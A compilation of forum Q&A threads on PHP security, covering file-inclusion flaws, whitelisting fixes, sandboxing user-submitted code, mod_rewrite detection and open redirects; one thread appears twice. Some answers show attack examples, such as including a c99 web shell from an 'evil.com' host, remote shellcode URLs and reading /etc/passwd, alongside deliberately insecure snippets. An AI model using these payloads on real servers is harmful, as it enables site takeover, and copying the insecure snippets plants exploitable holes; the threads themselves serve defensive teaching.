Best way to avoid code injection in PHP - php

My website was recently attacked by, what seemed to me as, an innocent code:
<?php
if ( isset( $ _GET['page'] ) ) {
include( $ _GET['page'] . ".php" );
} else {
include("home.php");
}
?>
There where no SQL calls, so I wasn't afraid for SQL Injection. But, apparently, SQL isn't the only kind of injection.
This website has an explanation and a few examples of avoiding code injection: http://www.theserverpages.com/articles/webmasters/php/security/Code_Injection_Vulnerabilities_Explained.html
How would you protect this code from code injection?

Use a whitelist and make sure the page is in the whitelist:
$whitelist = array('home', 'page');
if (in_array($_GET['page'], $whitelist)) {
include($_GET['page'].'.php');
} else {
include('home.php');
}

Another way to sanitize the input is to make sure that only allowed characters (no "/", ".", ":", ...) are in it. However don't use a blacklist for bad characters, but a whitelist for allowed characters:
$page = preg_replace('[^a-zA-Z0-9]', '', $page);
... followed by a file_exists.
That way you can make sure that only scripts you want to be executed are executed (for example this would rule out a "blabla.inc.php", because "." is not allowed).
Note: This is kind of a "hack", because then the user could execute "h.o.m.e" and it would give the "home" page, because all it does is removing all prohibited characters. It's not intended to stop "smartasses" who want to cute stuff with your page, but it will stop people doing really bad things.
BTW: Another thing you could do in you .htaccess file is to prevent obvious attack attempts:
RewriteEngine on
RewriteCond %{QUERY_STRING} http[:%] [NC]
RewriteRule .* /–http– [F,NC]
RewriteRule http: /–http– [F,NC]
That way all page accesses with "http:" url (and query string) result in an "Forbidden" error message, not even reaching the php script. That results in less server load.
However keep in mind that no "http" is allowed in the query string. You website might MIGHT require it in some cases (maybe when filling out a form).
BTW: If you can read german: I also have a blog post on that topic.

The #1 rule when accepting user input is always sanitize it. Here, you're not sanitizing your page GET variable before you're passing it into include. You should perform a basic check to see if the file exists on your server before you include it.

Pek, there are many things to worry about an addition to sql injection, or even different types of code injection. Now might be a good time to look a little further into web application security in general.
From a previous question on moving from desktop to web development, I wrote:
The OWASP Guide to Building Secure Web Applications and Web Services should be compulsory reading for any web developer that wishes to take security seriously (which should be all web developers). There are many principles to follow that help with the mindset required when thinking about security.
If reading a big fat document is not for you, then have a look at the video of the seminar Mike Andrews gave at Google a couple years back about How To Break Web Software.

I'm assuming you deal with files in the same directory:
<?php
if (isset($_GET['page']) && !empty($_GET['page'])) {
$page = urldecode($_GET['page']);
$page = basename($page);
$file = dirname(__FILE__) . "/{$page}.php";
if (!file_exists($file)) {
$file = dirname(__FILE__) . '/home.php';
}
} else {
$file = dirname(__FILE__) . '/home.php';
}
include $file;
?>
This is not too pretty, but should fix your issue.

pek, for a short term fix apply one of the solutions suggested by other users. For a mid to long term plan you should consider migrating to one of existing web frameworks. They handle all low-level stuff like routing and files inclusion in reliable, secure way, so you can focus on core functionalities.
Do not reinvent the wheel. Use a framework. Any of them is better than none. The initial time investment in learning it pays back almost instantly.

Some good answers so far, also worth pointing out a couple of PHP specifics:
The file open functions use wrappers to support different protocols. This includes the ability to open files over a local windows network, HTTP and FTP, amongst others. Thus in a default configuration, the code in the original question can easily be used to open any arbitrary file on the internet and beyond; including, of course, all files on the server's local disks (that the webbserver user may read). /etc/passwd is always a fun one.
Safe mode and open_basedir can be used to restrict files outside of a specific directory from being accessed.
Also useful is the config setting allow_url_fopen, which can disable URL access to files, when using the file open functions. ini-set can be used to set and unset this value at runtime.
These are all nice fall-back safety guards, but please use a whitelist for file inclusion.

I know this is a very old post and I expect you don't need an answer anymore, but I still miss a very important aspect imho and I like it to share for other people reading this post. In your code to include a file based on the value of a variable, you make a direct link between the value of a field and the requested result (page becomes page.php). I think it is better to avoid that.
There is a difference between the request for some page and the delivery of that page. If you make this distinction you can make use of nice urls, which are very user and SEO friendly. Instead of a field value like 'page' you could make an URL like 'Spinoza-Ethica'. That is a key in a whitelist or a primary key in a table from a database and will return a hardcoded filename or value. That method has several advantages besides a normal whitelist:
the back end response is effectively independent from the front end request. If you want to set up your back end system differently, you do not have to change anything on the front end.
Always make sure you end with hardcoded filenames or an equivalent from the database (preferrabley a return value from a stored procedure), because it is asking for trouble when you make use of the information from the request to build the response.
Because your URLs are independent of the delivery from the back end you will never have to rewrite your URLs in the htAccess file for this kind of change.
The URLs represented to the user are user friendly, informing the user about the content of the document.
Nice URLs are very good for SEO, because search engines are in search of relevant content and when your URL is in line with the content will it get a better rate. At least a better rate then when your content is definitely not in line with your content.
If you do not link directly to a php file, you can translate the nice URL into any other type of request before processing it. That gives the programmer much more flexibility.
You will have to sanitize the request, because you get the information from a standard untrustfull source (the rest of the Web). Using only nice URLs as possible input makes the sanitization process of the URL much simpler, because you can check if the returned URL conforms your own format. Make sure the format of the nice URL does not contain characters that are used extensively in exploits (like ',",<,>,-,&,; etc..).

#pek - That won't work, as your array keys are 0 and 1, not 'home' and 'page'.
This code should do the trick, I believe:
<?php
$whitelist = array(
'home',
'page',
);
if(in_array($_GET['page'], $whitelist)) {
include($_GET['page'] . '.php');
} else {
include('home.php');
}
?>
As you've a whitelist, there shouldn't be a need for file_exists() either.

Think of the URL is in this format:
www.yourwebsite.com/index.php?page=http://malicodes.com/shellcode.txt
If the shellcode.txt runs SQL or PHP injection, then your website will be at risk, right? Do think of this, using a whitelist would be of help.
There is a way to filter all variables to avoid the hacking. You can use PHP IDS or OSE Security Suite to help avoid the hacking. After installing the security suite, you need to activate the suite, here is the guide:
http://www.opensource-excellence.com/shop/ose-security-suite/item/414.html
I would suggest you turn on layer 2 protection, then all POST and GET variables will be filtered especially the one I mentioned, and if there are attacks found, it will report to you immediately/
Safety is always the priority

Related

LFI bypass of array method? [duplicate]

I'm using the "include" function (e.x. "include 'header2.php'" or "include 'class.users.php'")
to add the header or session class in my website. I don't really remember where, but I heard that hackers abuse, somehow, this "include" thing, sending the fake included page or something like that.
So basically I would like to know what's with that "include" function, how can I protect it, how do they abuse it and if there are better solutions for what I am looking for.
Thanks in advance.
It all depends on how you implement it. If you specifically set the path, then it's secure. The attack could happen if you allow user input to determine the file path without sanitization or checks.
Insecure (Directory Traversal)
<?php
include($_GET['file']);
?>
Insecure (URL fopen - If enabled)
<?php
include('http://evil.com/c99shell.php');
?>
Insecure
<?php
include('./some_dir/' . $_GET['file']);
?>
Partially Insecure ( *.php files are vulnerable )
<?php
include('./some_dir/' . $_GET['file'] . '.php');
?>
Secure (Though not sure why anyone would do this.)
<?php
$allowed = array(
'somefile.php',
'someotherfile.php'
);
if (in_array(basename($_GET['file']), $allowed)) {
include('./includes/' . basename($_GET['file']));
}
?>
Secure
<?php
include('./includes/somefile.php');
?>
The biggest issue with includes is likely changing filename extension from PHP to something that doesn't get automatically executed by the web server. For example- library.inc, or config.inc. Invoking these files with a web browser will reveal the code instead of executing it - and any passwords or exploitable hints will be shown.
Compare config.php that might have a password in it with config.inc. Pulling up config.inc would in most cases show what the database password was.
There are programmers who use .inc extensions for libraries. The premise is that they won't be in a directory accessible by a web server. However, less security paranoid programmers might dump that file into a convenient web directory.
Otherwise, ensure that you don't include a file that's submitted by a query string somehow. Ex: include( $_GET['menu_file'] ) <-- this is very wrong.
Include can be abused if you do something like this:
include($_GET["page"]);
and then call the URL:
myscript.php?page=index.php
attackers can then substitute index.php for hxxp://hackerz.ru/install_stuff.php and your server will gladly run it.
include itself is perfectly safe. Just make sure to always validate/escape your input.
Anything server side (assuming your server isn't compromised) is safe. Doing this:
Insecure
$var = $_GET['var']';
include $var . ".php";
Secure
include "page.php";
Include is safe provided you don't:
Include a remote file like www.someoneelsesssite.com/something.php
Include a file from a path that came from the client. www.mysite.com/bad.php?path=oops/here/is/your/passwords/file
Include a file from another possibly tainted source like a database.
2 and 3 technically have the caveat that if you disallow . or / or on windows \ you are probably fine. But if you don't know why, you don't know enough about it to risk it. Even when you think the database is read only or otherwise secure, it is wise to not assume that unless you really have to, which is almost never.
As pp19dd's answer points out. It is also vital that you name your includes with the .php extension. If you've set apache (or whatever web server you are using) to parse another file type as PHP too, that's safe as well. But if you don't know for sure, use .php exclusively.
The best thing to do is ensure that the page you are trying to include exists first. The real security loopholes come when your include page is processed from some sort of user input, such as a URL variable. ?include=page.php As long as you are cautious of these you should be fine.
if(is_file($file)) {
//other code, such as user verification and such should also go here
include $file;
}
else { die(); }
I'm using this method.
<?php include (dirname(__FILE__).'/file.php');

PHP - Is "include" function secure?

I'm using the "include" function (e.x. "include 'header2.php'" or "include 'class.users.php'")
to add the header or session class in my website. I don't really remember where, but I heard that hackers abuse, somehow, this "include" thing, sending the fake included page or something like that.
So basically I would like to know what's with that "include" function, how can I protect it, how do they abuse it and if there are better solutions for what I am looking for.
Thanks in advance.
It all depends on how you implement it. If you specifically set the path, then it's secure. The attack could happen if you allow user input to determine the file path without sanitization or checks.
Insecure (Directory Traversal)
<?php
include($_GET['file']);
?>
Insecure (URL fopen - If enabled)
<?php
include('http://evil.com/c99shell.php');
?>
Insecure
<?php
include('./some_dir/' . $_GET['file']);
?>
Partially Insecure ( *.php files are vulnerable )
<?php
include('./some_dir/' . $_GET['file'] . '.php');
?>
Secure (Though not sure why anyone would do this.)
<?php
$allowed = array(
'somefile.php',
'someotherfile.php'
);
if (in_array(basename($_GET['file']), $allowed)) {
include('./includes/' . basename($_GET['file']));
}
?>
Secure
<?php
include('./includes/somefile.php');
?>
The biggest issue with includes is likely changing filename extension from PHP to something that doesn't get automatically executed by the web server. For example- library.inc, or config.inc. Invoking these files with a web browser will reveal the code instead of executing it - and any passwords or exploitable hints will be shown.
Compare config.php that might have a password in it with config.inc. Pulling up config.inc would in most cases show what the database password was.
There are programmers who use .inc extensions for libraries. The premise is that they won't be in a directory accessible by a web server. However, less security paranoid programmers might dump that file into a convenient web directory.
Otherwise, ensure that you don't include a file that's submitted by a query string somehow. Ex: include( $_GET['menu_file'] ) <-- this is very wrong.
Include can be abused if you do something like this:
include($_GET["page"]);
and then call the URL:
myscript.php?page=index.php
attackers can then substitute index.php for hxxp://hackerz.ru/install_stuff.php and your server will gladly run it.
include itself is perfectly safe. Just make sure to always validate/escape your input.
Anything server side (assuming your server isn't compromised) is safe. Doing this:
Insecure
$var = $_GET['var']';
include $var . ".php";
Secure
include "page.php";
Include is safe provided you don't:
Include a remote file like www.someoneelsesssite.com/something.php
Include a file from a path that came from the client. www.mysite.com/bad.php?path=oops/here/is/your/passwords/file
Include a file from another possibly tainted source like a database.
2 and 3 technically have the caveat that if you disallow . or / or on windows \ you are probably fine. But if you don't know why, you don't know enough about it to risk it. Even when you think the database is read only or otherwise secure, it is wise to not assume that unless you really have to, which is almost never.
As pp19dd's answer points out. It is also vital that you name your includes with the .php extension. If you've set apache (or whatever web server you are using) to parse another file type as PHP too, that's safe as well. But if you don't know for sure, use .php exclusively.
The best thing to do is ensure that the page you are trying to include exists first. The real security loopholes come when your include page is processed from some sort of user input, such as a URL variable. ?include=page.php As long as you are cautious of these you should be fine.
if(is_file($file)) {
//other code, such as user verification and such should also go here
include $file;
}
else { die(); }
I'm using this method.
<?php include (dirname(__FILE__).'/file.php');

PHP: Secure way save and display user's code from CodeMirror

I'm setting up a simple web-based code editor using CodeMirror to help students learn basic HTML, CSS, and JavaScript.
I want the students to be able to save their code, so it is visible in a stand-alone browser window with its own link that can be shared with friends and family to show off their work (i.e. mydomain.com/users/their-username/test.html).
I currently have the following PHP, but I know my use of $content is not secure at all:
if ($_POST['type'] == 'save') {
$content = stripslashes($_POST['code']);
$username = addslashes(strip_tags($_POST['username']))); //i.e. markrummel
$filename = addslashes(strip_tags($_POST['filename']))); //i.e. test, index
$ext = addslashes(strip_tags($_POST['filetype']))); //i.e. html, css, js
$path = '/users/' . $username . '/';
$URL = $path . $filename . '.' . $ext;
file_put_contents($URL, $content);
}
In most cases $content should be safe HTML, CSS, or JavaScript, like: <p>My name is Mark</p>, but I want to be prepared in case something malicious is put into the code editor to be saved.
Any suggestions on how I can securely save and display their code? Is there a way to quarantine/sandbox each user's folder from other user folders and the rest of the website?
Maybe there is no secure way to do this and I shouldn't allow anyone I don't trust to save code to my server, but if there is a safe way to do this...that would be great for this project! If not, I'll figure something else out.
Thank you for any help or insight you can offer! -Mark
addslashes and stripslashes do nothing for you here at all. I'm not sure what you are trying to do with them but slashing a string is not a useful form of encoding for filename handling or really any context you are likely to meet in a webapp.
strip_tags is also of no use for anything to do with filenames; it removes HTML from a string (but even then not really in a good enough way to use as a guard properly against HTML injection).
$URL = $path . $filename . '.' . $ext;
file_put_contents($URL, $content);
Yeah, this is seriously unsafe. By putting .. segments in the username or filename, an attacker can store files outside the root path. With complete control of the filename including extension that can include executable files like .php or other sensitive files like .htaccess. (Even if $ext were limited to known-good values, depending on OS your server is running under, it may also be possible to evade that extension appending.)
Whilst it is possible to sanitise filenames by limiting the characters that can be used in them, it's harder than you think to make that watertight when you might be running on eg. a Windows server. It's almost always better to generate filenames yourself (eg using a unique integer ID instead of an attacker-supplied filename) for storage on your local filesystem. You can always use rewrites to make the files appear to have a different address.
In most cases $content should be safe HTML, CSS, or JavaScript
Are you sure that's safe then?
If you serve some user-supplied scripting from inside your domain, it can control everything any of your users does within the site. It could override or fake any user-level security controls you have, upload files under other users' names and so on.
You can try to sanitise submitted HTML to make it use only safe tags, but that's hard to get right, and of no use if you want to permit users to run CSS/JS!
Is there a way to quarantine/sandbox each user's folder from other user folders and the rest of the website?
Yes. Serve each area from a different hostname. eg. put the main site on http://www.example.com/ with sandboxes at http://tom.users.example.com/, http://dick.users.example.com/ and so on.
This prevents direct cross-site scripting. To ensure sandbox sites cannot read cookies from the main site, make sure it is not also running on example.com (redirect it to www.example.com).
This isn't quite a complete sandbox. If you need to ensure sandbox sites cannot write cookies to other sites (potentially breaking them by stopping their own cookies working then you have no choice but to run each sandbox in its own full domain. And if you have to guard against Java plugin URL connections, each sandbox needs its own IP address. This gets costly quick! But these are less serious attacks.

How to find out programmatically if a web server instance supports url rewrite

What I want to ask is if there is a way to find out if a web-server instance has URL Rewriting enabled. I need this in order to be able to instantiate the correct type of URL handler.
Theoretically you know in advance if you have it enabled or not and can use something to configure it. I would like, however, to be able to detect this setting automatically at runtime.
The URL rewrite rule would be something very simple like:
^/(.*)$ => /bootstrap.php
This guarantees that the relevant string is present in the REQUEST_URI, but doesn't pollute the _GET array.
Where did my research took me so far:
Apache.
In my opinion Apache has a very quirky approach, since it sets the REDIRECT_SCRIPT_URI header for rewrote URLs, but not for the ones that are not rewrote.
E.g. http://host/ana/are/mere would be re-wrote to index.php so the aforementioned header would be present, but http://host/ wouldn't be re-wrote.
Lighttpd.
Lighttpd with fast-cgi behaves OK, setting the REDIRECT_URI header if URL Rewrite is enabled for the current host. This is reliable.
Cherokee.
Well, for Cherokee there is no method that I found out, as it uses (in my opinion) a more complicated method for obtaining URL rewriting. (I.e., it's called internal redirect – and the fcgi process doesn't know that the request was redirected)
Also I haven't tested other http servers, as nginx, so if someone has some input on this matter I would love to hear it.
Not the most elegant solution, but you could create a directory, insert a .htaccess and a small php file and try to open it with curl/file_get_contents() from your actual code:
.htaccess
RewriteEngine on
RewriteRule ^(.*?)$ index.php?myparam=$1
index.php
<?php
//open with file_get_contents("http://yoursite/directory/test")
if($_GET['myparam']){die("active");}
?>
Although this might be acceptable during an installation, for performance reasons this shouldn't be used for every request on your site! Save the information somewhere (sqlite/textfile).
Update
Apache specific, but apache_get_modules()/phpinfo() in combination with array_search/strpos is maybe helpful to you.
It's already touched upon below, but I believe the following recipe is a rather waterproof solution to this problem:
Set up the redirection
Request a page through its rewritten url
If the request returns the page in question, you have redirection set up correctly, if you get HTTP 404 response, then it's not working.
The idea is basically that this works with just about any redirection method. It has already been mentioned, but bears reiterating, such tricks add quite a bit of overhead and are better performed only once (installation or from the settings panel) and then saved in the settings.
Some implementation details, choices to make and a little on how I came to this solution:
I remembered Drupal did such a check during the installing process, so I looked up how they did it. They had the javascript on the install page do an ajax request (synchronously, to prevent concurrency issues with the database). This requires the user installing the software to have javascript turned on, but I don't think that's an unreasonable requirement.
However, I do think using php to request the page might be a cleaner solution. Alongside not bothering with a javascript requirement, it also needs less data to be sent back and forth and just doesn't require the logic of the action to be spread over multiple files. I don't know if there are other (dis)advantage for either method, but this should get you going and let you explore the alternative choices yourself.
There is another choice to be made: whether to test in a test environment or on the normal site. The thing Drupal does is just have the redirection always turned on (such as in the apache case, have the .htaccess file that does redirects just be part of the Drupal download) but only write the fancy urls if the redirection is turned on in the settings. This has the disadvantage that it takes more work to detect which type of redirection is used, but it's still possible (you can for example add a GET variable showing the redirection engine either on a specific test page or even on every page, or you can redirect to a page that sets $redirectionEngine and then includes the real index). Though I don't have much experience with redirection other than with mod_rewrite on apache, I believe this should work with just about every redirection engine.
The other option here is to use a test environment. Basically the idea is to either create a folder and set up redirection for it, or remove the need for file system write access and instead have a folder (or a folder for each redirection engine). This has some disadvantages: you still need write access to set up the redirection for the main site (though maybe not for all redirection engine, I don't really know how you all set them up properly - but for apache you will need write access if you are going to turn on redirection), it might be easier for a bot to detect what software and what version of it you are using through accessing the tests (unless you remove the test folders after testing) and you need to be able to rewrite for only a part of the site (which makes sense for any redirection engine to be a possibility, but I'm not blindly going to assume this functionality). However, this does come with the advantage of it being easier to find out which rewrite engine is being used or basically any other aspect of the redirection. There might also be other advantages I don't know of, so I just give the options and let you pick your method yourself.
With some options left to the user, I believe this should help you set up the system in the manner that you like.
PHP has server-specific functions for Apache, IIS and NSAPI servers. I only have Apache but as merkuro suggested this works as expected:
<?php
if (in_array('mod_rewrite',#apache_get_modules()))
echo 'mod_rewrite enabled';
else
echo 'mod_rewrite not enabled';
?>
As PHP server-specific functions don't cover all the servers you'd like to test in this probably isn't the best solution.
I'd recommend merkuro's first answer - implementing then testing it in script. I believe it's the only way to get a good result.
Hope that helps!
You can programmatically check for the existence of mod_rewrite if the server is Apache by using the apache_get_modules() function in PHP:
$modules = apache_get_modules();
echo in_array('mod_rewrite', $modules) ? 'mod_rewrite detected' : 'mod_rewrite not detected';
This could be used as the first step, but it is not a full proof method by any means. Just because mod_rewrite is loaded does not mean it is available for your environment. This also doesn't help if you are on a server that is not Apache.
There are not many consistent methods that will work across all platform combinations. But since the result is consistent, you can test for that. Setup a special redirect, and have a script use PHP's cURL or file_get_contents() to check a test URL. If the redirect was successful, you will get the expected content, and you can test easily for this.
This is a basic .htaccess I setup to redirect ajax to ajax.php:
RewriteEngine On
RewriteRule ajax ajax.php [L]
The following PHP script will attempt to get the contents of ajax. The real script name is ajax.php. If the redirect fails, then it will not get the expected contents.
error_reporting(E_ALL | E_STRICT);
$url = 'http://'.$_SERVER['HTTP_HOST'].dirname($_SERVER['REQUEST_URI']).'/ajax';
$result = json_decode(#file_get_contents($url));
echo ($result === "foobar") ? 'mod_rewrite test was successful' : 'mod_rewrite test failed';
Lastly, here is the final piece of the script, ajax.php. This returns an the expected response when the redirect is successful:
echo json_encode('foobar');
I have setup a live example of this test, and I have also made available the full sources.
As all the awnser already mention, actually testing it is the only way to be sure it works. But instead of actually redirecting to an actual page and waiting for it to load, I would just check the header.
In my opinion this is quickly enough to be even used at runtime at a regular site. If it realy needs to be high performance, then ofcourse caching it is better.
Just put something like the following in your .htaccess file
RewriteEngine on
RewriteRule ^/redir/My/Super/Special/Hidden/Url/To/Test/$ /redir/longload.php [L,R=307]
And then you can use the following php code to check if mod_rewrite is enabled.
<?php
function HasModRewrite() {
$s = empty($_SERVER["HTTPS"]) ? '' : ($_SERVER["HTTPS"] == "on") ? "s" : "";
$sp = strtolower($_SERVER["SERVER_PROTOCOL"]);
$protocol = substr($sp, 0, strpos($sp, "/")) . $s;
$port = ($_SERVER["SERVER_PORT"] == "80") ? "" : (":".$_SERVER["SERVER_PORT"]);
$options['http'] = array(
'method' => "HEAD",
'follow_location' => 0,
'ignore_errors' => 1,
'timeout' => 0.2
);
$context = stream_context_create($options);
$body = file_get_contents($protocol . "://" . $_SERVER['SERVER_NAME'] . $port .'/redir/My/Super/Special/Hidden/Url/To/Test/', NULL, $context);
if (!empty($http_response_header))
{
return substr_count($http_response_header[0], ' 307')>0;
}
return false;
}
$st = microtime();
$x = HasModRewrite();
$t = microtime()-$st;
echo 'Loaded in: '.$t.'<hr>';
var_dump($x);
?>
output:
Loaded in: 0.002657
---------------------
bool(true)

Is this code vulnerable to hacker attack?

I am really new to online web application. I am using php, I got this code:
if(isset($_GET['return']) && !empty($_GET['return'])){
return = $_GET['return'];
header("Location: ./index.php?" . $return);
} else {
header("Location: ./index.php");
}
the $return variable is URL variable which can be easily changed by hacker.
E.g i get the $return variable from this : www.web.com/verify.php?return=profile.php
Is there anything I should take care? Should I use htmlentities in this line:
header("Location: ./index.php?" . htmlentities($return));
Is it vulnerable to attack by hacker?
What should i do to prevent hacking?
Apart from that typo on line 2 (should be $return = $_GET['return'];) you should do $return = urlencode($return) to make sure that $return is a valid QueryString as it's passed as parameter to index.php.
index.php should then verify that return is a valid URL that the user has access to. I do not know how your index.php works, but if it simply displays a page then you could end up with someting like index.php?/etc/passwd or similar, which could indeed be a security problem.
Edit: What security hole do you get? There are two possible problems that I could see, depending how index.php uses the return value:
If index.php redirects the user to the target page, then I could use your site as a relay to redirect the user to a site I control. This could be either used for phishing (I make a site that looks exactly like yours and asks the user for username/password) or simply for advertising.
For example, http://yoursite/index.php?return?http%3A%2F%2Fwww.example.com looks like the user accesses YourSite, but then gets redirected to www.example.com. As I can encode any character using the %xx notation, this may not even be obvious to the user.
If index.php displays the file from the return-parameter, I could try to pass in the name of some system file like /etc/passwd and get a list of all users. Or I could pass something like ../config.php and get your database connection
I don't think that's the case here, but this is such a common security hole I'd still like to point it out.
As said, you want to make sure that the URL passed in through the querystring is valid. Some ways to do that could be:
$newurl = "http://yoursite/" . $return;
this could ensure that you are always only on your domain and never redirect to any other domain
$valid = file_exists($return)
This works if $return is always a page that exists on the hard drive. By checking that return indeed points to a valid file you can filter out bogus entries
If return would accept querystrings (i.e. return=profile.php?step=2) then you would need to parse out the "profile.php" path
Have a list of valid values for $return and compare against it
this is usually impractical, unless you really designed your application so that index.php can only return t a given set of pages
There are many ways to skin this cat, but generally you want to somehow validate that $return points to a valid target. What those valid targets are depends on your specification.
If you're running an older version of both PHP 4 or 5, then I think you will be vulnerable to header injection - someone can set return to a URL, followed by a line return, followed by any other headers they want to make your server send.
You could avoid this by sanitising the string first. It might be enough to strip line returns but it would be better to have an allowed list of characters - this might be impractical.
4.4.2 and 5.1.2: This function now prevents more than one header to be
sent at once as a protection against
header injection attacks.
http://php.net/manual/en/function.header.php
What would happen if you put in a page that didn't exist. For example:
return=blowup.php
or
return=http://www.google.co.uk
or
return=http%3A%2F%2Fwww.google.co.uk%2F
You could obfuscate the reference by not including the .php in the variable. You could then append it in the code-behind and check for the existence of the file in your directory / use a switch statement of allowable values before redirecting to it.
In this case, it more depends on what's done with that part of the query string on index.php. If it's being sent to a database query, output, eval(), or exec() yes, its a very common security hole. Most other situations will be safe unfiltered, but its best to write your own general purpose sanitizing function which converts quotes of all varieties to their HTML entity, as well as equals symbols.
The things I would do are:
Define, what type of return values are allowed?
Write down all types of possible return values.
Then, make conclusions: what characters are not allowed, what is the maximum url length, what domains are allowed, etc.
Finally: make a filter function according to above conclusions.
I Thing hacker can do this
you will redirect if $_GET['return'] Contain any thing
the hacker can use it as xss
redirect to virus or any thing like it
but there is no ability to make any thing else

Categories